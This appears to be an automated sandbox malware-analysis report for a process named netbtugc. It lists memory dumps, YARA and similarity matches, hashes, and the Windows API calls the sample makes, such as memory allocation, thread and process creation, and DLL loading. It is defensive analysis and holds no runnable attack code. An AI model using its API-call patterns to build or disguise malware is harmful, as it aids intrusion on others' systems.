                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: e7ded2df3684e34450af23f305653201a160ab6498b7c15dbf9814e2279eddc6
                                                                                                  • Instruction ID: ac7556f81782c94df48184f65dd7c704ef50aecdf9b9dd05887e56850e2475a6
                                                                                                  • Opcode Fuzzy Hash: e7ded2df3684e34450af23f305653201a160ab6498b7c15dbf9814e2279eddc6
                                                                                                  • Instruction Fuzzy Hash: 1531AFB5A11248ABCB14DF98D880EEEB7F9EF8C304F108219F909A7344D770A951CBA5
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,19868134,?,?), ref: 02C79293
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: d7709514ee2329020b3af4891627251ef02a702f3bd03a5819cfb0ce790b7519
                                                                                                  • Instruction ID: 5804fc52a94ff71fe1baef667e0a5c77bf242e2abc5b08057c21a6fdad085bf4
                                                                                                  • Opcode Fuzzy Hash: d7709514ee2329020b3af4891627251ef02a702f3bd03a5819cfb0ce790b7519
                                                                                                  • Instruction Fuzzy Hash: 2A31C3B5A00648ABDB14DF98D880EEEB7F9EF8C314F148219F919A7240D770A911CFA5
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(02C61ED8,?,02C77F7F,00000000,00000004,00003000,?,?,?,?,?,02C77F7F,02C61ED8), ref: 02C79578
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: 2c6b097fc8b0a9e00e1c59ec0469c1ce528603cc43990c7808b7afa9a8d9d233
                                                                                                  • Instruction ID: 502f1d4643f88edfb1c673b1cc1f4c4004294b691adff46890b283ac0b7531df
                                                                                                  • Opcode Fuzzy Hash: 2c6b097fc8b0a9e00e1c59ec0469c1ce528603cc43990c7808b7afa9a8d9d233
                                                                                                  • Instruction Fuzzy Hash: EC2128B5A00248ABDB14DF98CC41FAFB7F9EF88304F104109FD08AB240D770A911CBA5
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033686569-0
                                                                                                  • Opcode ID: 91fee05013acfa8afd33ad9a8294b478d0bc46498a74c6224e8d1f78887c54bc
                                                                                                  • Instruction ID: 7fcef1bdd2be07d8f6a8336f501eef4853dbc6a4fa8ce8a04514971a78fde089
                                                                                                  • Opcode Fuzzy Hash: 91fee05013acfa8afd33ad9a8294b478d0bc46498a74c6224e8d1f78887c54bc
                                                                                                  • Instruction Fuzzy Hash: 3F117071601718BBD720EB69CC05FEF73ADEF85714F004649FA09AB280E771AA05CBA5
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C79374
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3c8c3387852ea1aa17cca153d03291839db23894fd08675a09245c5bbd617482
                                                                                                  • Instruction ID: 1284f32a6c39f00edbb9206070c74c8319bcf2b7d4e55afea3c0900198d8ba2c
                                                                                                  • Opcode Fuzzy Hash: 3c8c3387852ea1aa17cca153d03291839db23894fd08675a09245c5bbd617482
                                                                                                  • Instruction Fuzzy Hash: C090026521144803E580A5584904607000597D0302F51C41AA2064995ECB398C517139
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 499aeab2489b73d43817590f7b49ef189df1d03d8931babeba3253e9af9d2d77
                                                                                                  • Instruction ID: 9ac3cbd383ae123a31f13c732a83a93777c55ebfec4fdaf39ab1e1399f18fb53
                                                                                                  • Opcode Fuzzy Hash: 499aeab2489b73d43817590f7b49ef189df1d03d8931babeba3253e9af9d2d77
                                                                                                  • Instruction Fuzzy Hash: BA900225611044425580B16889449064005BBE1211751C52AA0998990DC77988656679
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 4534536de5bf3875cdbb5986060a6c6889fa67a0eb30ac9c2bb1a3106db944e9
                                                                                                  • Instruction ID: 807ca8132be87c901540979256d9206f90aeadeb53c83fd398544c4209d3e50b
                                                                                                  • Opcode Fuzzy Hash: 4534536de5bf3875cdbb5986060a6c6889fa67a0eb30ac9c2bb1a3106db944e9
                                                                                                  • Instruction Fuzzy Hash: 9D90023521104813E551A1584604707000997D0241F91C81BA0424998DD7768952B135
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f7aaf8208cd846ecb4e26adb88a9884a9ae497a0e44ecfb7af0d6921568424a3
                                                                                                  • Instruction ID: 74fad0c6a8d5ac9028dc0a8422c1f4959ed7a41c591cf2652a22e3c0f6bca7bf
                                                                                                  • Opcode Fuzzy Hash: f7aaf8208cd846ecb4e26adb88a9884a9ae497a0e44ecfb7af0d6921568424a3
                                                                                                  • Instruction Fuzzy Hash: 2F90022561104902E541B1584504616000A97D0241F91C42BA1024995ECB358992B135
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7ffead0e9363e0c89b684ce28f47c8effef19e0d0ce0ef97f8c1ae78340f28da
                                                                                                  • Instruction ID: 444045574c731ae49b1e929e332596556b1a5553be3f5a2edcb695e1a79e2eaa
                                                                                                  • Opcode Fuzzy Hash: 7ffead0e9363e0c89b684ce28f47c8effef19e0d0ce0ef97f8c1ae78340f28da
                                                                                                  • Instruction Fuzzy Hash: 9390022531104403E580B15855186064005E7E1301F51D41AE0414994CDB3588566236
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: b002beb74d7dd3a99abe6f76411b9f6fff220c6037b7e5e390fa829589d526da
                                                                                                  • Instruction ID: 15d409966cd088a46cf592a6491fa79f9a3c60c71e2e032183ef332cbe028379
                                                                                                  • Opcode Fuzzy Hash: b002beb74d7dd3a99abe6f76411b9f6fff220c6037b7e5e390fa829589d526da
                                                                                                  • Instruction Fuzzy Hash: 3F90022D22304402E5C0B158550860A000597D1202F91D81EA0015998CCB3588696335
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 096adf122fc975a6ef33922e6511b1f87b9c7cc4721a6987187d08b3cfba93d0
                                                                                                  • Instruction ID: b0eda6cbb23588ba992c3ac7ed0406f08b908e2f03fc4f90d1397261b5ad8020
                                                                                                  • Opcode Fuzzy Hash: 096adf122fc975a6ef33922e6511b1f87b9c7cc4721a6987187d08b3cfba93d0
                                                                                                  • Instruction Fuzzy Hash: 22900225252085526985F15845045074006A7E0241791C41BA1414D90CC7369856E635
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a4d485a09fae05af1297faae6e1d63d6c68108011bc06a5fe57b4667ad7ad291
                                                                                                  • Instruction ID: 4636ca9f53d626bbb9c6ccd2d46f8c061cdb080005e419025f3db3805344148f
                                                                                                  • Opcode Fuzzy Hash: a4d485a09fae05af1297faae6e1d63d6c68108011bc06a5fe57b4667ad7ad291
                                                                                                  • Instruction Fuzzy Hash: 6190023561514802E540A1584614706100597D0201F61C81AA04249A8DC7B5895175B6
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.33209248579.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_3440000_netbtugc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 5dff3f5c7f8632c1fc2f8232c465bc4180fd5531bd30aa1d550010bcf8246629
                                                                                                  • Instruction ID: 4782f1c4712880654e317d62a1a522f6cf674b597a8ce8aaf392d711b539515a
                                                                                                  • Opcode Fuzzy Hash: 5dff3f5c7f8632c1fc2f8232c465bc4180fd5531bd30aa1d550010bcf8246629
                                                                                                  • Instruction Fuzzy Hash: 8190022525509502E590B15C45046164005B7E0201F51C42AA08149D4DC77588557235

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C59EC2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID: !$'+$($;a$=5$>P$P_$Q6$]$m!$p$rj$~
                                                                                                  • API String ID: 2422867632-3036813704

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 0-2425402595

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 02C60F84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 536 2c60f10-2c60f22 537 2c60f2a-2c60f77 call 2c7be80 call 2c645d0 call 2c51410 call 2c71c10 536->537 538 2c60f25 call 2c7b470 536->538 548 2c60f97-2c60f9d 537->548 549 2c60f79-2c60f88 PostThreadMessageW 537->549 538->537 549->548 550 2c60f8a-2c60f94 549->550 550->548
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(34305561,00000111,?,?), ref: 02C60F84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 3Z43$aU04$aU043Z43$aU043Z43
                                                                                                  • API String ID: 1836367815-2425402595
                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 02C73B3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeUninitialize
                                                                                                  • String ID: @J7<
                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C64642
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C68364,00000010,?,?,?,00000044,?,00000010,02C68364,?,?,?), ref: 02C797A3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_2c50000_netbtugc.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  APIs
